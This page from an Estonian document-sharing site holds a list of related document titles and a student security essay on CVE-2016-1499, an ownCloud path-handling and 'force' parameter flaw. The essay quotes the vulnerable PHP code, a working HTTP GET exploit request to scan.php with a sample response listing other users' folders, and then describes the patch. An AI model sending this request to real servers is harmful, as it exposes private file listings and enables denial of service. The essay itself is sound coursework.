Microsoft Word - Referaat.docx

Seotud dokumendid
Microsoft Word - essee_CVE ___KASVANDIK_MARKKO.docx

TARTU ÜLIKOOL LOODUS- JA TÄPPISTEADUSTE VALDKOND ARVUTITEADUSE INSTITUUT Lauri Kongas Turvaauk CVE Referaat aines Andmeturve MTAT Õpp

SAF 7 demo paigaldus. 1.Eeldused SAF 7 demo vajab 32- või 64-bitist Windows 7, Window 8, Windows 10, Windows Server 2008 R2, Windows Server 2012, Wind

Microsoft Word - installation-guide.doc

Linux süsteemi administreerimine

Microsoft Word - ref - Romet Piho - Tutorial D.doc

MTAT Operatsioonisüsteemid - Turvalisus

PowerPointi esitlus

MTAT Operatsioonisüsteemid - Turvalisus

Loeng03

Microsoft Word - requirements.doc

Monitooring

P2P süsteemid

DNS teenus teoorias ja praktikas Autor Siim Adamson ITK Autor: Siim Adamson ITK

Operatsioonisüsteemi ülesanded

1 / loeng Tekstitöötlus Sisend/väljund Teksti lugemine Sõnad

Operatsioonisüsteemide ehitus

MS Word Sisukord Uue dokumendi loomine... 2 Dokumendi salvestamine... 3 Faili nimi... 4 Teksti sisestamine... 6 Klaviatuuril mitteleiduvat sümbolite l

PowerPoint Presentation

Müük (Microsoft Dynamics AX (Axapta) tarkvara) Paigaldusjuhend bifree.ee qlik.com

loeng2

X Window System tuntud kui: X11, X, X-Windows akendussüsteem/akendesüsteem rastergraafikat toetavatele ekraanidele UNIX-maailmas väga levinud mitmesug

EID TARKVARA (v.1812 baasil)

HAJUSSÜSTEEMID HAJUSSÜSTEEMID Peer-to-peer süsteemid Peer-to-peer süsteemide liigitus Liigitus Ründed Anonüümsus Puuräsi DHT Näide: Kazaa Näide: Kadem

MTAT Operatsioonisüsteemid - Turvalisus

Outlookist dokumendi registreerimine Plugina seadistamine Dokumendi registreerimine Outlookist Vastusdokumendi registreerimine Outlookist Outlooki plu

HAJUSSÜSTEEMID HAJUSSÜSTEEMID SOAP ja veebiteenused Web Services Web Services SOAP WSDL Ühilduvus UDDI Kihiline arhitektuur masinsuhtluse jaoks erinev

Andmeturve

Pangalingi spetsifikatsioon Pocopay pangalingilt makse algatamiseks tuleb kasutada teenust Kaupmees teeb päringu Pocopayle aadressile

Loeng05

Tartu Ülikool

StandardBooks_versiooni_uuendusWin

HAJUSSÜSTEEMID HAJUSSÜSTEEMID Nimeteenuse näited DNS DNS NIS NIS+ LDAP JNDI Hierarhiline Interneti nimede süsteem Põhilised päringud: Arvuti nime järg

Tartu Ülikool Loodus- ja täppisteaduste valdkond Arvutiteaduse instituut Sandra Puusepp CVE Referaat Tartu 2018

Programmi AnimatorDV Simple+ lühike kasutajajuhend

Õppematerjalide esitamine Moodle is (alustajatele) seminar sarjas Lõunatund e-õppega 12. septembril 2017 õppedisainerid Ly Sõõrd (LT valdkond) ja Dian

PowerPoint Presentation

Kom igang med Scratch

HAJUSSÜSTEEMID HAJUSSÜSTEEMID Kaugprotseduurid IDL kompileerimine ONCIDLnäide CORBAIDLnäide MIDLnäide DCERPCmuidomadusi XML-RPC JSON-RPC REST document

Hajussüsteemid

Juhend nutiterminali seadistamiseks ja kaardimaksete vastuvõtmiseks Ingenico Link/2500 ja icmp

Väärtusta oma vabadust. Eesti Yale Seifide Kasutusjuhend Mudelid: YSB/200/EB1 YSB/250/EB1 YSB/400/EB1 YLB/200/EB1 YSM/250/EG1 YSM/400/EG1 YSM/520/EG1

AU581 Kasutusjuhend

EE-macbook-retina-12-early2015-qs.indd

I Generaatori mõiste (Java) 1. Variantide läbivaatamine Generaator (ehk generaator-klass) on klass, milles leidub (vähemalt) isendimeetod next(). Kons

Kuidas hoida tervist töökohal?

KOTKAS AVE kasutajakeskne juhend Loomise Muutmise kuupäev: kuupäev: Versioon: 2.0 Klient: Keskkonnaministeeriumi Infotehno

Microsoft Word - TallinnLV_lihtsustatud_manual_asutuse_juhataja_ doc

Microsoft PowerPoint - BPP_MLHvaade_juuni2012 (2)

Hoia oma arvuti turvaline ja kiire 1.Leia start nupust alustades Juhtpaneel 2.Juhtpaneeli aadressiribalt leia Kõik juhtpaneeli üksused 3.Avanenud tööa

GRUPI-SMS Veebirakenduse kasutamise juhend Rakendus Elisa grupi-smsi rakendus Väljaandja Elisa Eesti AS Juhendi koostamise kuupäev Versioon

Loeng12

Kursuseprogramm IFI6054 Agiilne tarkvaraarendus 3 EAP Kontakttundide maht: 28 Õppesemester: K Eksam Eesmärk: Aine lühikirjeldus: (sh iseseisva töö sis

Kommunikatsiooniteenuste arendus (IRT0080) loeng 8/2014 Võrkude haldus Avo 1

Failiotsing: find paljude võimalustega otsingukäsk find kataloog tingimused kataloog - otsitakse sellest kataloogist ja tema alamkataloogidest tingimu

Microsoft Word - Lisa1 , Eramu piirded _LK1-7_.doc

Microsoft PowerPoint - Lisa 5 koolituse materjalid

Microsoft Word - Keypad-controller-manual-new_1.docx

E-arvete juhend

EESTI STANDARD EVS 896:2008 RAHVUSVAHELINE NUMERATSIOONIPLAAN ITU-T soovituse E.164 rakendamine Eestis See dokument on EVS-i poolt loodud eelvaade The

RIQASNet

HAJUSSÜSTEEMID HAJUSSÜSTEEMID Veebiteenused ja SOAP Web Services Web Services SOAP WSDL Ühilduvus UDDI Kihiline arhitektuur masinsuhtluse jaoks erinev

Andmeturve

AU350 kasutusjuhend

Microsoft Word - EVS_ISO_IEC_27001;2014_et_esilehed.doc

PHP

Sissejuhatus Informaatikasse Margus Niitsoo

Müügiarvete juhend VEP_

Microsoft Word - SCD38USB

KASUTUSJUHEND Mini Hi-Fi Süsteem Palun lugege see kasutusjuhend enne seadme kasutamist tähelepanelikult läbi ning hoidke see alles hilisemaks vaatamis

ATV_esmaspäev

FRESENIUS ÕPPEKESKUS KIIRJUHEND

Microsoft PowerPoint - EMCS13

EBSCO täistekstiandmebaaside kasutamine Otsingu sooritamiseks: 1. Logi sisse 2. Vali EBSCOhost Web 3. Seejärel vali andmebaas, milles soovid otsingut

Estonian_TBW-106UB(V1).cdr

Operatsioonisüsteemid 1. loeng

Excel Valemite koostamine (HARJUTUS 3) Selles peatükis vaatame millistest osadest koosnevad valemid ning kuidas panna need Excelis kirja nii, et

BIM360 ja RealityCapture

Microsoft Word - E-portfoolio-googlesites.docx

Pealkiri

(loeng3-ohtlikud_koodiloigud)

Microsoft Word - RM_ _17lisa2.rtf

KASUTUSJUHEND Mini hi-fi audio Palun lugege see kasutusjuhend enne seadme kasutamist tähelepanelikult läbi ning hoidke see alles hilisemaks vaatamisek

Tartu Ülikool Matemaatika-Informaatika Teaduskond Referaat Turvaauk CAN INDREK ZOLK Tartu, 2004

Side loeng 21

SQL

Õppekava arendus

E-õppe ajalugu

my_lauluema

遥控器使用说明书(ROHS) ALPA-CS349-R09D(E)-0301(内容)

DVD_8_Klasteranalüüs

IT infrastruktuuri teenused sissejuhatav loeng 00

I klassi õlipüüdur kasutusjuhend

Sidekursus 2002

ESET Smart Security Premium

Kiire Paigaldamine Otseühenduse Korral Lühi Manual DS-7000 Seeria NVR Salvestiste Jaoks

Väljavõte:

Tartu Ülikool Andmeturve Referaat teemal: CVE-2016-1499 Koostaja: Sander Sats Kursus: Informaatika Tartu 2016

Sissejuhatus Käesolev referaat on kirjutatud seoses Tartu Ülikooli kursuse MTAT.03.134 Andmeturve raames. Referaadi teema käsitleb turvaauku CVE-2016-1499, milles owncloud Server i versioonid enne 8.0.10, 8.1.x enne 8.1.5 ja 8.2.x enne 8.2.2 lubasid autenditud kasutajal ligi pääseda tundlikule informatsioonile või tekitada suurt protsessori koormust kasutades force parameetrit. Turvaaugu kirjeldus Eelmainitud owncloud i versioonide puhul oli võimalik kahte asja teha: 1. Kuna owncloud i sisemises failisüsteemile ligipääsu funktsioonis oli viga, siis tõlgendati sisse antud path i relatiivselt. Tänu sellele oli autenditud kasutajal võimalik näha kõiki faile, mis failisüsteemis olemas on. Võimekus piirdus siiski ainult nägemisega muudatusi õigusteta kasutaja teha ei saanud. 2. Force parameetri abil sai sundida serverit teel failini kõiki kaustu läbi vaatama ning kui nõutud fail oli piisavalt sügaval, siis võis see päris kulukaks osutuda. Tänu sellele oli võimalik Denial of Service rünne. $force = (isset($_get['force']) and ($_GET['force'] === 'true')); $dir = isset($_get['dir'])? (string)$_get['dir'] : ''; foreach ($users as $user) { $eventsource->send('user', $user); $scanner = new \OC\Files\Utils\Scanner($user, \OC::$server- >getdatabaseconnection()); $scanner->listen('\oc\files\utils\scanner', 'scanfile', array($listener, 'file')); $scanner->listen('\oc\files\utils\scanner', 'scanfolder', array($listener, 'folder')); try { if ($force) { $scanner->scan($dir); public function folder($path) { $this->eventsource->send('folder', $path); } public function file() { $this->filecount++; if ($this->filecount > $this->lastcount + 20) { //send a count update every 20 files $this->lastcount = $this->filecount; $this->eventsource->send('count', $this->filecount); }

} Nagu koodist näha on, siis võetakse force parameter ja directory path otse urlist ilma autenti kontrollimata ning hakatakse seejärel iga kasutaja kohta välja kuvama kaustades sisalduvate failide arvu. Rünne Järgneva HTTP GET päringuga on võimalik näha teiste kasutate kaustastruktuuri. GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<validreques TTOKEN> HTTP/1.1 Host: [HOST] Accept: text/event-stream Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Referer: [REFERER] Cookie: [COOKIES] Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Server response (shortened): event: user data: "[ID]" data: "\/" event: count data: 21 event: count data: 42 event: count data: 63 data: "\/[ID]" data: "\/[ID]\/cache" data: "\/[ID]6\/files" data: "\/[ID]\/files_encryption"

[...] data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip" data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip\/OC_DEFAULT_MODULE" data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].pptx" [...] Turvaaugu parandus Esimese hooga eemaldati kaustade välja kuvamine, mis parandab ära kaustade listingu näitamise valedele kasutajatele. Seejärel lisati scannerile kontroll, kas üldse saab sellest kaustast lugeda: Ning seejärel pandi failisüsteemi skännimine üldse cron jobiks nii et kasutaja seda ise käivitada ei saa.

Kasutatud kirjandus https://www.syss.de/fileadmin/dokumente/publikationen/advisories/syss-2015-062.txt https://github.com/owncloud/core/blob/fe575feca85ee6e6bb7b8b423a60d377bd364193/apps/file s/ajax/scan.php https://owncloud.org/security/advisory/?id=oc-sa-2016-002 https://github.com/owncloud/core https://github.com/owncloud/core/commit/703b6d1803d776122ec0604cf0f3ab807033206e